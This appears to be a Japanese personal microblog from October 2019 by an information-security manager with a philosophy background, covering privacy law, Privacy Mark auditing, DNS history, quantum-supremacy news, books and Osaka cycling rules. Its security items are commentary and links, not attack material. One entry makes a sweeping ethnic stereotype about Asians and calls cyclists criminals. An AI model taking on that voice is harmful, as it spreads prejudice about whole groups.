2019-10-25何日か前にも書いたけれど、人材不足の昨今、エンジニアはいかがですがという営業メールは誠に多い。それこそ、インドネシア人だとか、元自衛隊員だとか、そういう経歴の人々に特化した紹介会社もある。そして、そういう人々を安く雇用したところで、安く雇用したなりのリスクがあるのは当たり前だし、そもそも安かろうとどうであろうと大半の中小企業には原資がないか、原資を新しくファイナンスしようともしていないという実態がある。いくら大要として「銀行が間口を広げている」とは言われていても、実際に中小零細企業が融資を簡単に受けられるかというと、そういうわけでもない。そして、融資を受ける側においても、実際には人材を登用するというのは名目にすぎず、受けた資金の多くは自転車操業の原材料費に回るか、別の融資への返済に回るだけなのである。それが、どこの国でも言えると思うが、凡人がやっている他はない中小零細企業や個人事業主というものだ。よって、このような議論は名目と実態が乖離していることが多く、経済評論家の批評も、特に元マッキンゼーとか元大企業の財務とか、「企業」の99%を占める中小零細企業の実務を殆ど知らない連中が書いているものは、おおよそ経産省の資料とかネット・ベンチャーの安っぽいアンケートなどを使った空論であると言ってもいい。

2019-10-25paywall があるので後の内容は知らんけど、まぁ大要は下記のとおりだ。この話って、個人情報保護法を出し抜くことばかり考えてる池田信夫君みたいなリバタリアンを始め、個人情報保護法の専門家も話題にすることがあるんだけど、何年も前から実例が示されたことが一度もないんだよね。どういう場合に自治体ごとに異なる条例があって問題が起きてるの? 弊社は全国のメディアさんと協力してオンライン・サービスを運営しているけれど、個人情報の取扱いについて各都道府県の条例において問題が起きたことなど一度もないし、要するに(日経みたいなイエローペーパーの記事だし)脱法的な「イノベーション」とやらをしたい連中が叫んでるだけではないのかね。僕は、日本のプライバシー法制のプロパーとか専門家というのは、官公庁、業界、そしてメディアとの牽制関係でしかものを言ってないと判断してるので、彼らが何を提言していようと advocacy とは認めていない。高木浩光氏だろうと元切込隊長だろうと、他の著名なお歴々だろうと同じことだ。政府の個人情報保護委員会は、全国の自治体がばらばらに定めている個人情報保護ルールの一本化に着手する。現状は自治体ごとに個人情報の利用手続きが異なり、データ流通の壁になっているといわれる。乱立する条例の数から「2000個問題」と呼ばれていた。ルール統一で自治体の持つデータを企業が利用しやすくし、データビジネスの活性化につなげる。個人情報ルール統一へ 自治体「2000個問題…(写真=ロイター)

2019-10-24今日の昼頃に messages で書いた件(哲学っぽい小説のタイムラインを描いたという記事を切り捨てたもの)だけど、哲学のような分野、あるいは宗教学にも言えるとは思うけれど、およそ単独のプロパーが diversity を十分に満たすのは困難だろうと思うね。このタイムラインにしても、"philosophical novels" という前に "English (written)" という単語を付けるべきものだ。そして、そういう限定の言葉をつけないようなタイムラインを作ろうとするなら、当然だが色々な地域や言語や時代の見識をもつ人たちを集めて、共同作業する必要があると思う。アメリカの分析哲学の教員なんて、その 99% は原語で『老子』なんか読めないだろう(僕も含めて日本のプロパーもそうだろうけど)。

2019-10-24Galen Strawson って、動画で誰かに名前を呼ばれているのを観ると、みんな「ゲーレン」と発音してるなぁ。イギリス人というのは、これまたアメリカの英語に輪をかけて(アメリカの英語とぜんぜん違う単語があるだけではなく)発音も難しい。国内では、「ガレン」とか「ギャレン」と書いてる人が多いようだ。僕は「ギャラン」と書いていたが、改めよう。ああ、あと "The Secret Connexion" は第二版が出てたっけ。

2019-10-24ドイッチュ自身が朗読している、彼のエッセイだ。PDF で原文も公開されている。Possible Minds - Beyond Reward and Punishment (narrated by David Deutsch)

2019-10-24コメントにもあるが、僕もこういう演出というかプレゼンテーションは苦手だ。いくらアメリカ人でも、こんな芝居がかった喋り方は変だろう。というか、目がイッてるようにしか思えないな。Quantum supremacy: A three minute guide

2019-10-24そういう切り出し方があるのか。なるほど。案外、雄の方が派手な外見だったりするから、展示用に選ばれやすいのだろうか。A study led by NHM researcher Dr Natalie Cooper has uncovered discrepancies in gender representation, with significantly more male specimens than female.Why sexist bias in natural history museums really matters

2019-10-24さきほど『サピエンス全史』に言及したが、『イノベーションの逆説』だろうと『ブラック・スワン』だろうと『21世紀の資本論』だろうと、購入者の中で実際に読んだという人は、せいぜい1%もいれば良い方だろう。どれほど一時的には書店のポップやオンラインの出版系メディアで「現代の古典」などと騒がれていようと、半年も経てば BOOK OFF で投げ売りされているのが実情だ(大部の本なので『21世紀の資本論』はいまだに数千円するが、あと数年も待てばアマゾンで1円になるだろう。それまで読む価値を保っていれば読めばいい)。この手の本は実例を挙げたらきりがない。それこそ、毎年のように掲載される書店の売り上げランキングだとか、NYT や Times のベストセラーをご覧いただければ、そこに並んでいる本のどれくらいがそもそもいまだに発売されているのか、古本屋やアマゾンの古書としてはどれくらいの値段になっているのかを確認できるだろう。そもそも、大半の人々に同じような知的インパクトを与える著作物などというものは存在しないし、おそらく「し得ない」と言ってもいい。聖書ですら日本人の大半は読んでいないだろうし、いくらブルーバックスでニュートンのプリンキピアを再刊しても、自然系のプロパーや学生ですら好事家だけが所蔵するだろう。何らかの知的なインパクトというものは、それこそ大半の人々がこぞって読むという実態には生じないのであって、それぞれの人たちがそれぞれの目的や経緯があって読みながら、異なる脈絡や心境で感銘を受けたり影響を受けるものなのである。よって、わざわざ大きなインパクトを狙ってマーケティングにいそしんだ本が本当に誰かの役に立つ(もっと多くの役に立つ)などという根拠はないのだ。

2019-10-24プライバシーマークの帳票管理やマネジメント・システムの運用がややこしいとか面倒だという話はよく聞くのだけれど、こういうことはコンサルティングや監査ではなく、マネジメントの実務をやっている人に原則を聞けば、だいたいの大まかな流れや要点は分かる。マネジメント側の合致監査を含む点検を除けば、個人データの特定(個人情報の台帳)、リスク分析とアセスメント、導入した安全管理措置の運用監査、そしてマネジメント・レビューという四つの手順をしっかりやっておけば問題はないんだよね。その他の、入退室の記録を始めとする細々とした帳票は、安全管理措置を実際にやってるという証拠にすぎない。

2019-10-24やっぱり DNS の歴史を調べていて困るのは、検索結果が "DNS history"(DNS 通信履歴)というセキュリティの話題と混在することだ。"-security" として正しく除外できるかと言えば、DNS の歴史について書いているなら、当然だが DNS のセキュリティに関する話題も扱っている筈なので、有益なページも除外される恐れがある。かといって、初期の歴史だけに絞って、"ARPANET" というキーワードをわざと必須にするというアプローチで検索してみたのだが、初期の事跡に詳しいページに限って消失したり、途中で更新が放棄されていたりして中途半端だ。それを思うと、下記の Softpanorama のコンテンツは、csh/tcsh のサイトでも大いに参考とさせていただいているが、DNS についても丁寧にコンテンツが更新されていて賞賛に値する。http://www.softpanorama.org/DNS/index.shtml

2019-10-24uni(三菱鉛筆)の "Signo 307" のページを作るのに、ナノセルロースというか高分子化学の教科書を読んでいる。文房具のファン・サイトを内外問わずにたくさん見たが、まぁ殆ど例外なくただの主観的な書きやすさの話しかしてないよね。それで文具オタクや文具ファンを名乗るとは程度の低い連中だ。あと、ナノセルロースのようなインクの材質についてだけではなく、そもそも Signo 307 の前に海外では Signo 207 というゲルインクの商品があって(その後、2008年から国内でも展開された)、307 はそれの改良版として登場したのだという人文系のアプローチすら、日本の文具サイトには欠けている。つまり、自然系のアプローチだろうと人文・社会系のアプローチだろうと、何の見識ももたずに特定の分野や商品について語っているのだ。これでは、オタクなんて外形的に学者やジャーナリストや評論家の真似事をして権威と発言力が欲しいだけのルサンチマン集団だと言われても仕方ない。

2019-10-24「強い」の一言で終わってしまうのがソフトバンクのあっけなさだ。巨人は初戦で今季限りの引退を表明した阿部のホームランだけが見せ場だったかのようである。それにしても、一勝すらできなかった巨人の不甲斐なさはもちろんだが、ソフトバンクの短期決戦での強さは何なのか。読売とは桁違いの裏ボーナスでも出るのかな。

2019-10-24アマゾンの僕のウイッシュリストに入ってる本がいくつかある。でも、正直なところ『サピエンス全史』って、どれくらいの知的インパクトがあったのか疑わしいんだよね。この手の人類史って前からあるわけで、もちろん有名なのはトインビーだし、アジアの辺境地帯でも田舎大学の学長さんが暇つぶしにこの手の通史を何冊も書いてるよね・・・もちろん下記の記事で紹介されているリストには、読みたい、あるいは読むべきタイトルが幾つもあるわけだけど、たかが今世紀に入って20年も経っていない時点で選ぶというのも、なんだか《マーケティング》という観点を優先した発想のように思う。あと、これは哲学者として言うわけだけど、誰もが必ず手に取るべき著作物なんてものは存在しない。あると仮定しても、敢えて言うなら、それはたぶん母国語の国語辞典くらいのものだと思うね。リストを見ての感想は、Guardian は確か映画についても同じ企画をやってたと思うが、それと同様に「21世紀」というくくりなのに2000年発表の作品がいくつも入っていて、正直「バカ?」と思うが、まぁ、もちろん分かってやってるんでしょうけど。Guardianが選ぶ21世紀最高の本トップ100(の邦訳リスト) - YAMDAS現更新履歴

2019-10-24京都大学の某教授の最終講義についてお知らせが記事として投稿されていた RSS から記事を読めるのだが、なぜか RSS のタイトルにはパスワードで保護されているという表示が出ている。サイトで普通に記事の一覧を見ても、このエントリーはそのまま掲載されているため、なんで RSS ではパスワードで保護されている体裁なのか。WordPress の何かのエラーなんだろうか。

2019-10-24会社が上場するかどうにかして年収がもっとあったら、こういうのに補助を出せる基金とかに寄付したいんだけどなぁ。もちろん日本科学哲学会のメンバーの学生を支援するのが目的だ(基礎論学会は入ってないから実情は知らない)。おおよそ3人くらいを年に二回くらいのカンファレンスに送り出すとなると、滞在費や渡航費だけでも1回あたり1人で数十万円はかかるから、年に200万円くらいは寄付する必要があろうか。宝くじでも当たったら一度に2,000万円くらい寄付できるのだけど。大学で20万円前後の補助を出してるところもあるけれど、なかなかそれだけでは難しいだろうし、大学の補助だけでは足りない。This February the graduate conference on philosophy of physics will take place in Oxford. All current graduate students (except students enrolled at Oxford at the time of the conference) working on philosophy of physics or philosophy of science are welcome to submit a paper. The keynote will be given by Eleanor Knox (KCL).Philosophy of Physics Graduate Conference

2019-10-24あくまでも哲学者、それからこの手のフローチャートについてはデザイナーとしても言うけど、何の説得力も魅力もないわ。分類の仕方に何の一貫して適正なパースペクティブも思想も着眼点も見受けられないし、図書館の本棚を眺めて回った子供が自由研究に本のタイトルを並べ直してみましたという印象しか受けないね。Ben Roth, a philosopher who teaches in the Harvard College Writing Program, has put together a kind of flowchart recommending philosophical novels and stories.A Flowchart of Philosophical Novels and Stories - Daily Nous

2019-10-24ともかく、何が流れてきてるのか分かったものではない。実際、肥溜めの中身といった些細な例だけでなく、工場が浸水して高度な工業汚染水が漏れたという実例も報道されている。坂本医師は「水害後の片づけ作業は子どもにとって感染症や有害物質のリスクが非常に高い」と指摘。「水害のあとには、水や泥の中にサルモネラや大腸菌といった感染症の原因となる細菌が含まれていることがあります。また、周辺に工場などがある場合は有害な化学物質が入っているおそれもあり、子どもは大人と比べて影響を受けやすいため感染症や将来の発達への悪影響が懸念されます」と話します。子どもは危険 手伝わせないで! 水害後の後片づけ | NHKニュース

2019-10-24なんやかんやと語られているけれど、こんな政府の情報管理にとってクリティカルな役割になりうる仕組みは、設計や事前の調査だけで数億円を使ってもいいようなものだと思うし、そもそも実装なんてする前に試験的なシステムを開発して、サービス単位でのパフォーマンスや様々な攻撃への検証を行うものだ。GitHub でバラ撒かれてる玩具を使うことしか考えてない都内の IT ベンチャーとか地方のしょーもない開発ベンダーの小僧には分からないスケールの話だと思うが、IT ゼネコンにいて、まともなキャパシティ・プランニングやソフトウェア・エンジニアリングの素養をもつ人々からすれば、20億円なんてまともな予算じゃないよ。逆に、こんな小遣い銭ていどで実装なんてしてはいけない。そういう意味で、20億円を無駄に使ったという点は同感だ。総務省が2013年に運用を開始した「政府共通プラットフォーム」では、インターネットから遮断された環境を提供する「セキュアゾーン」という機能があるが、この機能が1度も使われることのないまま廃止されていたことが報じられている(NHK、MSN)。総務省が18億円かけて導入したセキュリティシステム、一度も使わることなく廃止 | スラド セキュリティ

2019-10-24個人情報だけに限らず、仕事の道具を抱えて飲みに行くこと自体、たとえば博報堂さんの社員だと取り引き相手の制作会社ですら博報堂の情報セキュリティ部門に通報していいレベルの事案なんだよね。一般企業ですらそういうルールを実装しているわけであって、サイバーセキュリティの担当は、警察や公安でも軍隊並みの規律が必要だよ。紛失していたのは割賦販売法違反などの容疑で捜査していた事件の資料の写し。巡査部長は5月30日、横浜市中区内で同僚らと飲酒後にかばんを紛失。資料はその中に入れていたとみられる。かばんは紛失翌日に拾得物として見つかったが、巡査部長が写しを入れていたという認識がなかったために発覚が遅れた。神奈川県警サイバー犯罪捜査課、個人情報39人分流出 盗難車から見つかる - 毎日新聞

2019-10-24昔から会社で思うんだけどさ、社内でやたらと溜息をついてる人って会社へ何しに来てるんだろうなぁ。しかもうちの場合は人事がそれをやってるから、僕は士気に影響があると思ってるんだよね。しょせん、会社は(全てではなくとも)軍隊と同じ組織運営が必要なのだし、カジュアルな人がいるのはいいけれど、だらしない人がいるのは困る。

2019-10-24日本のホテルで使ってるロボットが簡単にハックできるという話が出ている。実際、RPA というトレンドがあるにしても、その導入したシステムをまともに検証もできなければ運用方法もリスクも分かってない人たちが「人件費の削減」とか事務屋の営業に言われて契約してるだけというのが実情である。そのうち、RPA システムの扱いそのものが面倒だったり、メンテナンスに予想外のコストがかかったりして、またぞろ「IT人材が不足しているっ!」といったマッチ・ポンプの記事が躍るのであろう。そんなに技術者が必要なら、あんたらはいったい何を売っていたのかという話なのだが。

2019-10-24凄いな。高度変化だけで経路を予測し、GPS の記録がなくても場所を特定できてしまうのか。http://front.math.ucdavis.edu/1910.09041

2019-10-24有線のインターフェイスで接続する周辺機器にも side-channel attack は可能だが、とりわけ無線のキーボードやマウスにはネットワークを利用していることで生じやすい脆弱性がある。こういう理由もあって、僕はあまり無線の周辺機器というのは使っていない。自宅では、このほどスマートフォンからも無線で印刷できるプリンタを導入したのだが、必要なければ無線のネットワークは有効にしないよう注意が必要だと思う。https://packetstormsecurity.com/files/154956/SYSS-2019-011.txt

2019-10-24このレベルでブログ記事を書いてる人がたくさんいるわけで、日本にも技術者として取り組んでる人はいると思うけれど、そのベースを支えながらこうして論評も書いてるようなプロパーが圧倒的に少ないという印象がある。まぁ、海外でも科学哲学のプロパーは殆ど何も書いてないけどな。From the beginning, it was clear that quantum supremacy would not be a milestone like the moon landing—something that’s achieved in a moment, and is then clear to everyone for all time. It would be more like eradicating measles: it could be achieved, then temporarily unachieved, then re-achieved. For by definition, quantum supremacy all about beating something—namely, classical computation—and the latter can, at least for a while, fight back.https://www.scottaaronson.com/blog/?p=4372

2019-10-24この事案のように DNS の暗号化に反対する企業もあるわけで、僕が DNS にも関心をもっているのは、DNS の暗号化がネットワーク中立性にも関わるからだ。https://www.vice.com/en_us/article/9kembz/comcast-lobbying-against-doh-dns-over-https-encryption-browsing-data

2019-10-24何が "dropshipping" なのかと思ったら、そうやってでも収益を上げないといけないという事情の話で、記事の中身は Newsweek の経営がかなり苦しいということだ。したがって、clickbait だの原稿料の支払い遅延だのという問題が生じるのも分かる。日本語の Newsweek オンライン版は、もうかなり酷いもので読むのをやめてしまったが、本家も似たようなものなのだな。Dropshipping journalism

2019-10-24同じく、たとえば新型の iPhone が発表されたとか次の Windows が出たとか、もちろん "news" の定義には当てはまるだろうけど、そんなに価値のあることなのかな。プロパーにとってはそうだろうし、そういう価値観の《基準がある》ということを否定するつもりはない。そして、プロパーとはそういう異なる価値観の基準を通俗的な基準とは別にもつことが望ましいのだ。しかし、だからといって専門家の価値観の基準を安易にマス・メディアに持ち込むと、それは単なる私企業の広告にしかならないわけで、もっと言えば一種の株価操作に利用されている可能性もある。A Japanese semi-public broadcasting organization NHK make a coverage of a "quantum supremacy" announcement by Google, a private company. It looks like a scene in some SF movie where the only company rule the world.#here

2019-10-24このところ Rust の性能に魅了された人々がシェルを書き換えたり、希望としては OS も書き換えようとしている。その一環として、既存のツールを Rust で書き直すことで潜在的なセキュリティ・ホールを塞ぐ可能性と、かたや書き直すことで潜在的なセキュリティ・ホールが生じる可能性とを比較しつつ、このような "Rewrite it in Rust" というアプローチを採用している場合もあるらしい。そして、下記の文章のように RiiR は危険であるし生産的ですらないという意見もある。http://adventures.michaelfbryan.com/posts/how-not-to-riir/

2019-10-24結果がよく検証されてもいない "quantum supremacy" に関する一私企業の発表を安易に「報道」する NHK って、まったく最近は TechCrunch かと思うほどだ。STAP 騒動を反省して情報科学プロパーを職員に加えたかと思ったら、旧態依然としているらしい。それでは某政党だけでなく色々な方面から突っ込まれるのも仕方ない。

2019-10-24厳密にはこういう事実もプライバシーに該当するとは思うが、昨日はインフルエンザの予防注射を接種してもらってきた。会社の福利厚生により無料で行かせてもらえるため、こういうことは利用しないと損だ。自費で接種してもらうと、大阪市の場合は65歳以上だと大阪市からの受託医療機関で1,500円、65歳以下では料金に少しばらつきがあるものの、おおよそ3,000円前後はかかる。成人だと1回だけ接種すればいいらしいが、それでも3,000円の出費はたいていのサラリーマンにとっては痛い。僕にしても、会社で摂る昼食は毎週の金曜日だけ弁当ではなく外食しているのだが(インデアンカレーの大盛りは10月から830円)、3,000円あれば3回分の食事ができる。実際、僕にも人並みに昇給する年度があるけれど(建前は年俸制の会社なので、自動的に給与が物価に連動して上がったりはしない。よって、額面=数字が同じという年度もあるので、たいていは物価が上昇するから、そういう年度は実質的な減俸と同じである)、せいぜい1ヵ月の給与としては5,000円くらいのアップであり、当然だが給与が上がると税率や社会保険料率も上がるので、手取りとして増えるのはせいぜい3,000円といったところだろう。つまり、自分で予防接種してもらうと昇給した手取りが帳消しになってしまう。いくら仕事なんて関係なくても自分の身を守るための投資とは言え、これでは困る。もし自費で接種してもらうなら、毎月300円ずつ予防接種貯金でもした方がいい。

2019-10-24今年中を目途に、再び SNS のアカウントを整理したい。いま会社のアカウントも含めて四つほど Twitter のアカウントを持っていて、他にも Instagram だの Pinterest だの Facebook だのと持っているが、少なくとも Instagram と Pinterest は技術、風俗トレンド、仕事のあらゆる点で使い続けても学術的にもビジネスの観点から言っても何の有益な知見や経験も得られないと思う。そもそも、大手広告代理店案件をやってる会社で殆ど話題にも企画書の候補にも上ってこないメディアなんて意味ないだろう。あと、Facebook は過去に複数のアカウントを取得して維持しているのだが、実名で登録しているものだけ残して、他のアカウントは維持する意味がないし使ってもいないし、何らかの事情で退避先として使うべき必要も感じられないので、これは登録を解除しようと思う。そういや、他にも SNS に該当する海外のサービスは、いわゆるマイクロブログの一覧を MD で公開していた10年くらい前にたくさん登録したのだが、もう殆ど残ってはいまい。せいぜい、ウェイポーくらいではなかろうか。いちど、改めて昔のページを探して再検証してみよう。Twitter については、お遊びのアカウントを集約する予定だ。情報セキュリティ事務局として運用している業務のアカウントは、全て英語で書いているので、東アジアの辺境地域でしょーもない暇つぶしにいそしんでいる人々が寄り付いてこないから気楽だ。

2019-10-23書いているのは "Ronald Dworkin" という人物だが、著名な法哲学者とは別人だ。もちろんプロパーならご存知のように、法哲学者のドゥオーキンは2013年に亡くなっている。こちらの人物は麻酔学あるいは「ペイン・クリニック」とか疼痛医学などと呼ばれる分野の人物だが、政治哲学で学位を受けているため、法哲学のドゥオーキンに近い分野でのエッセイもあるからややこしい。それにしても、雑に描かれた "Newton" とやらを藁人形にして比較する相手として、代替医療に懐疑的だったネッターを持ち出すのはどうなんだろうな。The Limits of Science

2019-10-23本日は新しい帳票を作成していた。特になくてもいいものだが、プライバシーマークの現地監査だけでなく社内の監査においても、年間を通してやっている活動の成果が分かりやすくなるよう、情報セキュリティ委員による月次のチェックから集約するような形式で運用監査シートを作成した。実際には、もともと使っている「運用監査シート」と項目は殆ど同じなのだが、フォーマットとして情報セキュリティ委員の活動と成果に連動した記録として示すことで、普段からやっている社内活動と監査の結果(つまり月次のチェックシートの集約が部門ごとの運用監査の記録でもあるから)が自然に結びつくようになっている。こうしておかないと、もちろん従来の運用監査シート(ちなみに、これはマネジメントシステムの適合性を自主監査した記録である「合致監査シート」とは別のものだ)でも委員会の活動から作成しているのだが、あくまでも不適合がなかったことをチェックするだけの体裁なので、どういう委員会の活動からそういう結論が出たのかを知ることはできない。これでは、プライバシーマークの現地審査で来訪される審査員に説明する場合だけでなく、経営会議の中で報告する場合でも、委員会の活動について会議の記録を何十枚も見せる他は無くなるため、明解に委員会の役割を理解してもらうには専用のフォーマットで記録を作り直した方がよいと判断したのである。

2019-10-23RFC1034 には古典的な RFC とあって幾つかの翻訳があるのだけれど、これはページの体裁からして意味不明な改行が多く読み辛い。使ってるウェブ・アプリケーションに特有のプレゼンテーションなのかもしれないが、出力されている HTML の論理構造を満たすモデル(つまりセマンティクスの評価をしている)も妥当性があるように思えない。空っぽの span が山のように出力されている時点で、これはアプリケーションの挙動を優先した(SEO 対策ですらない)、システムによるシステムのための表示ということなのだろう。「インターノット」がどうたらとか言ってる人たちもそうだが、何となく理屈倒れの印象がぬぐえないな。あと、このサイトの DNS に関する他のコンテンツにも言えるけど、この手の Wiki アプリケーションの表現方式なり CSS 定義って、情報が羅列してあるだけで何が重要なのか分かりにくいよ。しかも何の意味があるのか不明な改行とかインデントとかシステム内でしか意味を持たないリンクの表記とかが雑然としていて、「ドキュメント・リソース」の名に値しないと思う。オンラインに公開されているだけの個人的な走り書きといったところだろう。MoinMoin という Python ベースの Wiki アプリケーションは僕も使ったことはあるのだけれど、ユーザがわざと編集しなければこんな表示にはならない筈だ。https://moin.qmail.jp/DNS/RFC/1034/2

2019-10-23どうやら昨年の末まではあったらしい letsencrypt.jp という Let's Encrypt の解説サイトが消失している。多くのブログ記事でポイントされているのだが、いったいいつ頃まであったのかは分からない。letsencrypt.jp にリンクしている、2019年の5月に公開されたブログ記事というのもあるけれど、素人の解説記事なんてリソースを本当に表示確認して書いてるのかどうか分かったものではないからだ。

2019-10-23円周寺という、3月14日にでも何か数学のイベントをやってそうな寺の近くに、マネジメントシステム評価センターとかいう JIS の認証機関(ISR016)があるようだ(さきほど確認すると円周寺よりももっと北だった。吉野家の隣にあるビルのようだ)。ISMS の概要についてセミナーのお知らせをいただいている。認証機関は全国で30機関ていどあり、実際には審査員の多くは契約社員として各地で現地審査をしている。僕のキャリア・パスとして、こういう審査員も視野に入るのは確かだが、どちらかと言えば企業内で現状に鑑みてマネジメント・システムを構築していくようなコンサルティングなり CISO の方が向いているような気がする。審査する方になると、僕の場合は既存の規格や法律や理論の制約内に話を制限するのが難しいのではないか。

2019-10-23まだご紹介していなかったようだが、crontab のスケジュール・ルールを確認できるサイトだ。https://crontab.guru/

2019-10-23HHK で思い出した。キーボードのタイピングで滑らかにキーをタイプする人がいるのを見て、感心することがあったのだった。動画か何かで観たところ、ピアノを弾くように滑らかなタッチでキーを叩いている。いや、ピアノの演奏にも言えることだが、「叩く」というよりも自分の意図する力の入れ方で「押す」と言った方が適切なくらいだ。場合によっては「触れる」とでも言えるほどの繊細な扱い方にもなろう。淀みなくタイプされているので、これはつまり入力するべきことを次々と決めながら作業しているということなので、指運びだけではなく思考にも目を見張るべきだろう。僕はどちらからと言うと大きな音を出してタイピングしているので、ああいうタイピングは興味深い。https://www.pfu.fujitsu.com/hhkeyboard/hhkbpro2/standard.html

2019-10-23キーボードを左上に3度くらい傾ける習慣がある。恐らくだが、Shift や Ctrl キーでショートカットを頻繁に使うため、傾いていると小指がそれらのキーに届きやすいのだろう。ただし、キーボード全体が傾くので、右手の指ともども全てのキーの水平位置を調整しながらタイピングしているらしく、キーボードを水平に置いたり、他人のキーボードをいきなり使うときは打ちにくい。とは言え、そうはしていても左の Shift キーなどは左手の小指をホームポジションからわざわざ伸ばさないと届かないのが普通なので、どのみち小指を動かすなら、小指の負担だけにすればキーボードを水平に保ったまま他の指におかしな癖を付けずに済む。そういうことで、ここ最近は会社の業務マシンで使う HHK は水平に置いている。

2019-10-23この連休で、ようやく『水平記』(高山文彦/著、新潮文庫)の上下巻を読了した。読んでいて、あらためて読書の効用というアイデアを考えていたのだが、その一つは関連する事項なり参考文献を調べたり読み進めていく興味が湧くということだろう。『水平記』を読んでいる間も、よく知らない事柄が出てきて調べながら読んでいたし、参照されている文献を調べたりしていた。もちろん作品そのものも興味深く読んだのだが、一つの話題に関わる事項(もちろん、その関連付けが正しいかどうかの評価は別にあろう)を繋げていくことにも、こういう著作の価値はある。

2019-10-23あれ? 日本科学哲学会のサイトが更新されてるのに、PHILSCI.INFO の表記は変わってないなぁ。もういっかい調べるか。ひとまず生成しているハッシュ値を全てメールで通知するようにした。毎時5分の実行なので、次は10:05だ。ひとつおかしいのは、ヘテムルで実行させている CRONTAB は「5 * * * *」(毎時5分)で指定しているのだが、実行するたびに値が同じでも上書きしなおしている(よってタイムスタンプは変わる)筈の出力先ファイルが 10/1 で止まっているということだ。動いていない? [update] 出力ファイルの中身を調整するので、もう少しお待ちを。

2019-10-23ブラウザを起動するあいだ、マウスを少し動かすと(意味もなくマウスを動かす癖は、特に珍しいものでもないと思う)何か引っかかるので裏面を綺麗に拭いた。そしていざ起動したブラウザに向かうと、いったい何のためにブラウザを起動したのか忘れてしまった。一か月に一度くらいはこういうことがあり、即座にああそうだったと思い出すこともあるが、いまのように全く思い出せないこともある。ただ、それもたいていは問題ない。実際、特に意味もなくブラウザを起動することだってあるからだ。

2019-10-22読書の途中、「昭和電工事件」の記述が出てきたので少し調べていた。驚くことに、この事件で贈収賄が疑われた政治家や官僚が続々と逮捕され内閣も総辞職したほどの影響があったというのに、昭和電工は翌年に株式を上場している。当時の証券取引所が(まぁいまでもクソみたいな粉飾会社を上場させてるわけだが)いかに杜撰な審査をしていたかがわかる。主幹事の証券会社が単なる数字合わせしかしていないのは、インセンティブを考えたら当たり前のことだが、証券取引所まで安易な上場審査をやっていると、何の牽制にもならない。内部統制だと後から言っても、それまでの浪費をどうするのかという問題になるわけで、東証の人間が引責辞任した話なんて聞いたことがない。あと、昭和電工事件ってノン・フィクション作品にも小説にもなってないわけで、少し調べた限りでは内閣が総辞職までしたのに教科書にすら載っていないという。やはり《各種団体》や名のあるお歴々が出版社に圧力をかけ続けてきたからだろうか。こういうのを見ても思うのだが、朝日や毎日や岩波にしても、やはり「ネトウヨ」みたいに抵抗できる連中にしか抵抗しないんだよね。本当に抵抗できない勢力は言葉にすることすら不可能だし、敢えて言及すると陰謀論者扱いになる。

2019-10-22自己啓発本に対抗する自己啓発というスローガンで書かれた "Everything is F*cked" の著者にアーネスト・ベッカー財団がインタビューしている。とにかく、マインドフルネスにしてもマインド・セットにしても、このところ心だ、メンタルだ、意識だと山のような数の本が出ている。そんなに啓発的な内容の著作が、世界中でこれほどの頻度と密度で生産できるわけもないのに、それこそジュンク堂でも毎日のように新刊が店頭に並ぶ。慎重に判断したり、丁寧に学んだり、正直に思うところを言う。このような努力を積み上げつつ、他人と衝突する場合に冷静に対応するということを、それぞれが実行すれば、こんな自己啓発本なんて全く1冊も必要ない社会となるわけだが、本当の社会科学的なスケールの問題というものは、そういう本を手に取ろうともしない連中をどうするかということにあるので、結局は《知った人がどう対処するか》の話にしかならないのが難しい。哲学も社会的な影響を考えるときは、全く同じ思考が求められる。哲学書を手に取らない人にどう訴えるかが、本当は大切なのだ。思想オタクや読書マニアなんてどうでもいいんだよ。Mark Manson is a best-selling author, entrepreneur, and life-advice blogger. His website markmanson.net receives over two million monthly visitors. Mark drew on Ernest Becker’s work for inspiration for his most recent book, The Subtle Art of Not-Giving A F*ck: A Counterintuitive Approach to Living a Good Life, which has appeared on both the New York Times’ and Washington Post’s Bestseller List. He graciously took time to chat with EBF staffer Christa Masson about his new book, Ernest Becker, and how to live a good life.http://ernestbecker.org/on-becker-and-the-subtle-art-of-not-giving-a-fck/

2019-10-21アーネスト・ベッカーの著作を改めて掘り起こした人だ。それはそうと、ベッカーの本は洋書ですら手に入りにくくなってきている。平凡社には、「平凡社ライブラリー」にベッカーの『死の拒絶』を入れてもらいたい。Through decades of studies, Solomon and his colleagues have shown that people suppress their fear of mortality by supporting those who are similar to themselves. "If somebody does something that's in accord with your belief system, then being reminded of death should make you like them more so," Solomon says.We

2019-10-20これなぁ。特に大都市の繁華街は歩道や路側帯が店の看板や違法駐輪・違法駐車で通行不能になっているわけだけど、もう大阪府警は指導なんてやる気ないだろう。1990年にはついに6,000万台を超え自動車の駐車公害は激化している。そして道路はみ出しの自動販売機や看板そして放置自転車が歩行者の「聖域」である歩道を「侵略」している。https://www.jstage.jst.go.jp/article/kotsuken/1995/13/1995_28/_article/-char/ja

2019-10-20興味がある学会にいちいち入ってたら金がいくらあっても足りないので、J-Stage で公開されている論説を利用させていただく。ちなみに、この学会のサイトも2016年くらいでニューズレターの更新も止まっているみたいだ。何か2016年前後でウェブサイトの更新が止まってるサイトが目に付くのだが、何か日本全体で一斉に学会の運用に関わる変化があったのだろうか。まさか学会のサイトを運用するのに科研費なんて使うわけがないし、この手の学会をサポートしてるウェブ制作業者が倒産したとか、多くの学会で使ってる CMS に何らかの脆弱性があったとか、何か共通の出来事があったのかな。http://www.kotsuken.jp/journal/journal.html

2019-10-20たとえ違法であろうと危険なことはしないという回答は、さすが法律など(世俗の法であれ宗教的な律であれ)何とも思わないアジア人らしい態度だ。そしてさらに、車道を走行している自転車であっても信号で停止などしない犯罪者どもであふれかえっているのが実態であり、交通弱者の歩行者でもなければ、違法行為をすると即座に法的な問題になる自動車のドライバーでもない、自転車の運用者(そもそも日本語に自転車に乗る人を表す一般名詞がないという事実が、自転車というものの社会的な身分がはっきりしないという実情を如実に表している)が公道で自分たちのやりたいようにしている姿を目にしている今日では、やはり自転車を歩行者として扱うのは無理があるのだし、少なくとも大阪市だけで自動車と同じ扱いとして免許制にするのが最も良いと思う。大阪は、既にご存じの方も多いと思うが、商店街を自転車で走行するのが定常となっているわけで、もうこういう状況を《風習》であるかのように看過するのは、外国からの観光客が増えてくると事故が増えるのを黙って眺めているだけなのと同じだろう。本研究では,自転車利用者に対し,これまで自転車歩道通行可規制によって歩道を通行していた道路において,同規制の撤廃により歩道通行が禁止され車道を通行するように交通ルールが変更になった場合を想定した聞き取り調査を行い,ルール変更後に道路のどの位置を通行するつもりであるか,またその理由についての回答を得た.その結果,ルール変更後も歩道を通行すると回答した者が多数を占め,その理由として車道通行に対する危険感が指摘された.その危険感をもたらす原因として,交通環境,道路環境,個人特性の各側面